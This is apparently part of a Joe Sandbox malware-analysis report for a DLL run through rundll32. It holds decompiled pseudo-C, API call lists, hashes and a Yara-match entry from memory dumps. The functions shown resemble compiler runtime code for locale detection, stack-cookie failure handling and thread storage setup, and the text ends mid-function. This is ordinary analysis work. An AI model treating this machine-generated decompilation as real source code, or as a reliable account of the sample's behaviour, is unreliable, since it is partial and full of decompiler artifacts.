                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                        • String ID: LOC
                                                                                                        • API String ID: 4018564869-519433814
                                                                                                        • Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
                                                                                                        • Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
                                                                                                        • Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
                                                                                                        • Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 85%
                                                                                                        			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                        				intOrPtr _v0;
                                                                                                        				void* _v804;
                                                                                                        				intOrPtr _v808;
                                                                                                        				intOrPtr _v812;
                                                                                                        				intOrPtr _t6;
                                                                                                        				intOrPtr _t11;
                                                                                                        				intOrPtr _t12;
                                                                                                        				intOrPtr _t13;
                                                                                                        				long _t17;
                                                                                                        				intOrPtr _t21;
                                                                                                        				intOrPtr _t22;
                                                                                                        				intOrPtr _t25;
                                                                                                        				intOrPtr _t26;
                                                                                                        				intOrPtr _t27;
                                                                                                        				intOrPtr* _t31;
                                                                                                        				void* _t34;
                                                                                                        
                                                                                                        				_t27 = __esi;
                                                                                                        				_t26 = __edi;
                                                                                                        				_t25 = __edx;
                                                                                                        				_t22 = __ecx;
                                                                                                        				_t21 = __ebx;
                                                                                                        				_t6 = __eax;
                                                                                                        				_t34 = _t22 -  *0x10057a08; // 0xef7d8b91
                                                                                                        				if(_t34 == 0) {
                                                                                                        					asm("repe ret");
                                                                                                        				}
                                                                                                        				 *0x1005afc0 = _t6;
                                                                                                        				 *0x1005afbc = _t22;
                                                                                                        				 *0x1005afb8 = _t25;
                                                                                                        				 *0x1005afb4 = _t21;
                                                                                                        				 *0x1005afb0 = _t27;
                                                                                                        				 *0x1005afac = _t26;
                                                                                                        				 *0x1005afd8 = ss;
                                                                                                        				 *0x1005afcc = cs;
                                                                                                        				 *0x1005afa8 = ds;
                                                                                                        				 *0x1005afa4 = es;
                                                                                                        				 *0x1005afa0 = fs;
                                                                                                        				 *0x1005af9c = gs;
                                                                                                        				asm("pushfd");
                                                                                                        				_pop( *0x1005afd0);
                                                                                                        				 *0x1005afc4 =  *_t31;
                                                                                                        				 *0x1005afc8 = _v0;
                                                                                                        				 *0x1005afd4 =  &_a4;
                                                                                                        				 *0x1005af10 = 0x10001;
                                                                                                        				_t11 =  *0x1005afc8; // 0x0
                                                                                                        				 *0x1005aec4 = _t11;
                                                                                                        				 *0x1005aeb8 = 0xc0000409;
                                                                                                        				 *0x1005aebc = 1;
                                                                                                        				_t12 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_v812 = _t12;
                                                                                                        				_t13 =  *0x10057a0c; // 0x1082746e
                                                                                                        				_v808 = _t13;
                                                                                                        				 *0x1005af08 = IsDebuggerPresent();
                                                                                                        				_push(1);
                                                                                                        				E100227FB(_t14);
                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                        				_t17 = UnhandledExceptionFilter(0x1002b434);
                                                                                                        				if( *0x1005af08 == 0) {
                                                                                                        					_push(1);
                                                                                                        					E100227FB(_t17);
                                                                                                        				}
                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                        			}



















                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167d5
                                                                                                        0x100167db
                                                                                                        0x100167dd
                                                                                                        0x100167dd
                                                                                                        0x1001c395
                                                                                                        0x1001c39a
                                                                                                        0x1001c3a0
                                                                                                        0x1001c3a6
                                                                                                        0x1001c3ac
                                                                                                        0x1001c3b2
                                                                                                        0x1001c3b8
                                                                                                        0x1001c3bf
                                                                                                        0x1001c3c6
                                                                                                        0x1001c3cd
                                                                                                        0x1001c3d4
                                                                                                        0x1001c3db
                                                                                                        0x1001c3e2
                                                                                                        0x1001c3e3
                                                                                                        0x1001c3ec
                                                                                                        0x1001c3f4
                                                                                                        0x1001c3fc
                                                                                                        0x1001c407
                                                                                                        0x1001c411
                                                                                                        0x1001c416
                                                                                                        0x1001c41b
                                                                                                        0x1001c425
                                                                                                        0x1001c42f
                                                                                                        0x1001c434
                                                                                                        0x1001c43a
                                                                                                        0x1001c43f
                                                                                                        0x1001c44b
                                                                                                        0x1001c450
                                                                                                        0x1001c452
                                                                                                        0x1001c45a
                                                                                                        0x1001c465
                                                                                                        0x1001c472
                                                                                                        0x1001c474
                                                                                                        0x1001c476
                                                                                                        0x1001c47b
                                                                                                        0x1001c48f

                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 1001C445
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
                                                                                                        • UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 1001C488
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2579439406-0
                                                                                                        • Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
                                                                                                        • Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
                                                                                                        • Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
                                                                                                        • Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E1000FF59(void* __ecx) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				signed int _t5;
                                                                                                        				void* _t15;
                                                                                                        				void* _t18;
                                                                                                        				void* _t19;
                                                                                                        
                                                                                                        				_t15 = __ecx;
                                                                                                        				if((E10012862(__ecx) & 0x40000000) != 0) {
                                                                                                        					L6:
                                                                                                        					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
                                                                                                        					asm("sbb eax, eax");
                                                                                                        					return  ~( ~_t5);
                                                                                                        				}
                                                                                                        				_t19 = E1000A7CE();
                                                                                                        				if(_t19 == 0) {
                                                                                                        					goto L6;
                                                                                                        				}
                                                                                                        				_t18 = GetKeyState;
                                                                                                        				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                                                                                        					goto L6;
                                                                                                        				} else {
                                                                                                        					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        			}









                                                                                                        0x1000ff5c
                                                                                                        0x1000ff68
                                                                                                        0x1000ffb0
                                                                                                        0x1000ffb2
                                                                                                        0x1000ffb9
                                                                                                        0x00000000
                                                                                                        0x1000ffbb
                                                                                                        0x1000ff6f
                                                                                                        0x1000ff73
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ff75
                                                                                                        0x1000ff82
                                                                                                        0x00000000
                                                                                                        0x1000ff96
                                                                                                        0x1000ffa5
                                                                                                        0x00000000
                                                                                                        0x1000ffad

                                                                                                        APIs
                                                                                                          • Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D
                                                                                                        • GetKeyState.USER32(00000010), ref: 1000FF7D
                                                                                                        • GetKeyState.USER32(00000011), ref: 1000FF86
                                                                                                        • GetKeyState.USER32(00000012), ref: 1000FF8F
                                                                                                        • SendMessageA.USER32 ref: 1000FFA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: State$LongMessageSendWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1063413437-0
                                                                                                        • Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
                                                                                                        • Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
                                                                                                        • Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
                                                                                                        • Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.303938818.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.303934318.0000000003090000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.303955009.00000000030B6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_3090000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t73;
                                                                                                        				struct HINSTANCE__* _t78;
                                                                                                        				_Unknown_base(*)()* _t79;
                                                                                                        				struct HINSTANCE__* _t81;
                                                                                                        				signed int _t92;
                                                                                                        				signed int _t94;
                                                                                                        				unsigned int _t97;
                                                                                                        				void* _t113;
                                                                                                        				unsigned int _t115;
                                                                                                        				signed short _t123;
                                                                                                        				unsigned int _t124;
                                                                                                        				_Unknown_base(*)()* _t131;
                                                                                                        				signed short _t133;
                                                                                                        				unsigned int _t134;
                                                                                                        				intOrPtr _t143;
                                                                                                        				void* _t144;
                                                                                                        				int _t145;
                                                                                                        				int _t146;
                                                                                                        				signed int _t164;
                                                                                                        				void* _t167;
                                                                                                        				signed int _t169;
                                                                                                        				void* _t170;
                                                                                                        				int _t172;
                                                                                                        				signed int _t176;
                                                                                                        				void* _t177;
                                                                                                        				CHAR* _t181;
                                                                                                        				void* _t183;
                                                                                                        				void* _t184;
                                                                                                        
                                                                                                        				_t167 = __edx;
                                                                                                        				_t184 = _t183 - 0x118;
                                                                                                        				_t181 = _t184 - 4;
                                                                                                        				_t73 =  *0x10057a08; // 0xef7d8b91
                                                                                                        				_t181[0x118] = _t73 ^ _t181;
                                                                                                        				_push(0x58);
                                                                                                        				E10017BC1(E10027E56, __ebx, __edi, __esi);
                                                                                                        				_t169 = 0;
                                                                                                        				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                        				 *(_t181 - 0x14) = 0;
                                                                                                        				 *(_t181 - 0x10) = 0;
                                                                                                        				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                        				 *(_t181 - 0x18) = _t78;
                                                                                                        				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                        				if(_t79 == 0) {
                                                                                                        					if(GetVersion() >= 0) {
                                                                                                        						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                        						if(_t81 != 0) {
                                                                                                        							 *(_t181 - 0x14) = 0;
                                                                                                        							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
                                                                                                        							if( *(_t181 - 0x14) != 0) {
                                                                                                        								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                        								_t145 = _t97 & 0x3ff;
                                                                                                        								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                        								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                        								 *(_t181 - 0x10) = 2;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						 *(_t181 - 0x18) = 0;
                                                                                                        						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                        							 *(_t181 - 0x44) = 0x10;
                                                                                                        							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                        								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                        								_t184 = _t184 + 0xc;
                                                                                                        								if(_t113 == 1) {
                                                                                                        									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                        									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                        									_t146 = _t115 & 0x3ff;
                                                                                                        									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                        									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                        									 *(_t181 - 0x10) = 2;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							RegCloseKey( *(_t181 - 0x18));
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t123 =  *_t79() & 0x0000ffff;
                                                                                                        					 *(_t181 - 0x14) = _t123;
                                                                                                        					_t124 = _t123 & 0x0000ffff;
                                                                                                        					_t164 = _t124 & 0x3ff;
                                                                                                        					 *(_t181 - 0x1c) = _t164;
                                                                                                        					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                        					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                        					 *(_t181 - 0x10) = 2;
                                                                                                        					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                        					if(_t131 != 0) {
                                                                                                        						_t133 =  *_t131() & 0x0000ffff;
                                                                                                        						 *(_t181 - 0x14) = _t133;
                                                                                                        						_t134 = _t133 & 0x0000ffff;
                                                                                                        						_t172 = _t134 & 0x3ff;
                                                                                                        						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                        						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                        						 *(_t181 - 0x10) = 4;
                                                                                                        					}
                                                                                                        					_t169 = 0;
                                                                                                        				}
                                                                                                        				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                        				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                        				_t181[0x105] = 0;
                                                                                                        				_t181[0x104] = 0;
                                                                                                        				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                        					_t143 = 0x20;
                                                                                                        					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                        					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                        					 *(_t181 - 0x5c) = _t181;
                                                                                                        					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                        					 *(_t181 - 0x48) = 0x10000000;
                                                                                                        					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                        					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
                                                                                                        					 *(_t181 - 4) = _t169;
                                                                                                        					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                        						E1000A2DF(_t181 - 0x3c);
                                                                                                        					}
                                                                                                        					_t176 = 0;
                                                                                                        					if( *(_t181 - 0x10) <= _t169) {
                                                                                                        						L23:
                                                                                                        						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                        						E1000A8D0(_t181 - 0x3c);
                                                                                                        						_t92 = _t169;
                                                                                                        						goto L24;
                                                                                                        					} else {
                                                                                                        						while(1) {
                                                                                                        							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
                                                                                                        							if(_t94 != _t169) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							_t176 =  &(1[_t176]);
                                                                                                        							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							goto L23;
                                                                                                        						}
                                                                                                        						_t169 = _t94;
                                                                                                        						goto L23;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t92 = 0;
                                                                                                        					L24:
                                                                                                        					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                        					_pop(_t170);
                                                                                                        					_pop(_t177);
                                                                                                        					_pop(_t144);
                                                                                                        					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                        				}
                                                                                                        			}
































                                                                                                        0x1000aa3a
                                                                                                        0x1000aa3b
                                                                                                        0x1000aa41
                                                                                                        0x1000aa45
                                                                                                        0x1000aa4c
                                                                                                        0x1000aa52
                                                                                                        0x1000aa59
                                                                                                        0x1000aa6a
                                                                                                        0x1000aa71
                                                                                                        0x1000aa74
                                                                                                        0x1000aa77
                                                                                                        0x1000aa7a
                                                                                                        0x1000aa88
                                                                                                        0x1000aa8b
                                                                                                        0x1000aa8f
                                                                                                        0x1000ab5d
                                                                                                        0x1000ac19
                                                                                                        0x1000ac1d
                                                                                                        0x1000ac31
                                                                                                        0x1000ac34
                                                                                                        0x1000ac3e
                                                                                                        0x1000ac44
                                                                                                        0x1000ac5c
                                                                                                        0x1000ac68
                                                                                                        0x1000ac6d
                                                                                                        0x1000ac70
                                                                                                        0x1000ac70
                                                                                                        0x1000ac3e
                                                                                                        0x1000ab63
                                                                                                        0x1000ab77
                                                                                                        0x1000ab82
                                                                                                        0x1000ab98
                                                                                                        0x1000aba7
                                                                                                        0x1000abbf
                                                                                                        0x1000abc4
                                                                                                        0x1000abca
                                                                                                        0x1000abd6
                                                                                                        0x1000abd9
                                                                                                        0x1000abeb
                                                                                                        0x1000abf7
                                                                                                        0x1000abfc
                                                                                                        0x1000abff
                                                                                                        0x1000abff
                                                                                                        0x1000abca
                                                                                                        0x1000ac09
                                                                                                        0x1000ac09
                                                                                                        0x1000ab82
                                                                                                        0x1000aa95
                                                                                                        0x1000aa9d
                                                                                                        0x1000aaa0
                                                                                                        0x1000aaa3
                                                                                                        0x1000aab5
                                                                                                        0x1000aabe
                                                                                                        0x1000aac6
                                                                                                        0x1000aad3
                                                                                                        0x1000aad6
                                                                                                        0x1000aadd
                                                                                                        0x1000aae1
                                                                                                        0x1000aae5
                                                                                                        0x1000aae8
                                                                                                        0x1000aaeb
                                                                                                        0x1000aaf8
                                                                                                        0x1000ab04
                                                                                                        0x1000ab09
                                                                                                        0x1000ab0c
                                                                                                        0x1000ab0c
                                                                                                        0x1000ab13
                                                                                                        0x1000ab13
                                                                                                        0x1000ab18
                                                                                                        0x1000ab1b
                                                                                                        0x1000ab32
                                                                                                        0x1000ab39
                                                                                                        0x1000ab48
                                                                                                        0x1000ac7e
                                                                                                        0x1000ac85
                                                                                                        0x1000ac95
                                                                                                        0x1000ac98
                                                                                                        0x1000ac9b
                                                                                                        0x1000aca2
                                                                                                        0x1000aca5
                                                                                                        0x1000acac
                                                                                                        0x1000acb8
                                                                                                        0x1000acc2
                                                                                                        0x1000acc7
                                                                                                        0x1000acc7
                                                                                                        0x1000accc
                                                                                                        0x1000acd1
                                                                                                        0x1000acee
                                                                                                        0x1000acee
                                                                                                        0x1000acf5
                                                                                                        0x1000acfa
                                                                                                        0x00000000
                                                                                                        0x1000acd3
                                                                                                        0x1000acd3
                                                                                                        0x1000acda
                                                                                                        0x1000ace2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ace4
                                                                                                        0x1000ace8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000acea
                                                                                                        0x1000acec
                                                                                                        0x00000000
                                                                                                        0x1000acec
                                                                                                        0x1000ab4e
                                                                                                        0x1000ab4e
                                                                                                        0x1000acfc
                                                                                                        0x1000acff
                                                                                                        0x1000ad07
                                                                                                        0x1000ad08
                                                                                                        0x1000ad09
                                                                                                        0x1000ad1e
                                                                                                        0x1000ad1e

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1000AA59
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
                                                                                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
                                                                                                        • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
                                                                                                        • GetVersion.KERNEL32 ref: 1000AB55
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
                                                                                                        • _sscanf.LIBCMT ref: 1000ABBF
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
                                                                                                        • ConvertDefaultLocale.KERNEL32(74E04EE0), ref: 1000ABFA
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1000AC09
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
                                                                                                        • EnumResourceLanguagesA.KERNEL32 ref: 1000AC34
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
                                                                                                        • ConvertDefaultLocale.KERNEL32(74E04EE0), ref: 1000AC6B
                                                                                                        • _memset.LIBCMT ref: 1000AC85
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                        • API String ID: 434808117-483790700
                                                                                                        • Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
                                                                                                        • Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
                                                                                                        • Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
                                                                                                        • Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E1001C11B(void* __ebx) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                        				long _t10;
                                                                                                        				void* _t11;
                                                                                                        				int _t12;
                                                                                                        				void* _t18;
                                                                                                        				intOrPtr _t21;
                                                                                                        				long _t26;
                                                                                                        				void* _t30;
                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                        				void* _t40;
                                                                                                        				void* _t42;
                                                                                                        
                                                                                                        				_t30 = __ebx;
                                                                                                        				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                        				if(_t37 != 0) {
                                                                                                        					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                        					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
                                                                                                        					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
                                                                                                        					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                        					__eflags =  *0x1005aea4;
                                                                                                        					_t40 = TlsSetValue;
                                                                                                        					 *0x1005aeb0 = _t7;
                                                                                                        					if( *0x1005aea4 == 0) {
                                                                                                        						L6:
                                                                                                        						 *0x1005aea8 = TlsGetValue;
                                                                                                        						 *0x1005aea4 = E1001BDD2;
                                                                                                        						 *0x1005aeac = _t40;
                                                                                                        						 *0x1005aeb0 = TlsFree;
                                                                                                        					} else {
                                                                                                        						__eflags =  *0x1005aea8;
                                                                                                        						if( *0x1005aea8 == 0) {
                                                                                                        							goto L6;
                                                                                                        						} else {
                                                                                                        							__eflags =  *0x1005aeac;
                                                                                                        							if( *0x1005aeac == 0) {
                                                                                                        								goto L6;
                                                                                                        							} else {
                                                                                                        								__eflags = _t7;
                                                                                                        								if(_t7 == 0) {
                                                                                                        									goto L6;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t10 = TlsAlloc();
                                                                                                        					__eflags = _t10 - 0xffffffff;
                                                                                                        					 *0x10057d30 = _t10;
                                                                                                        					if(_t10 == 0xffffffff) {
                                                                                                        						L15:
                                                                                                        						_t11 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					} else {
                                                                                                        						_t12 = TlsSetValue(_t10,  *0x1005aea8);
                                                                                                        						__eflags = _t12;
                                                                                                        						if(_t12 == 0) {
                                                                                                        							goto L15;
                                                                                                        						} else {
                                                                                                        							E10018042();
                                                                                                        							 *0x1005aea4 = E1001BD03( *0x1005aea4);
                                                                                                        							 *0x1005aea8 = E1001BD03( *0x1005aea8);
                                                                                                        							 *0x1005aeac = E1001BD03( *0x1005aeac);
                                                                                                        							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
                                                                                                        							_t18 = E1001A3D3();
                                                                                                        							__eflags = _t18;
                                                                                                        							if(_t18 == 0) {
                                                                                                        								L14:
                                                                                                        								E1001BE05();
                                                                                                        								goto L15;
                                                                                                        							} else {
                                                                                                        								_push(E1001BF91);
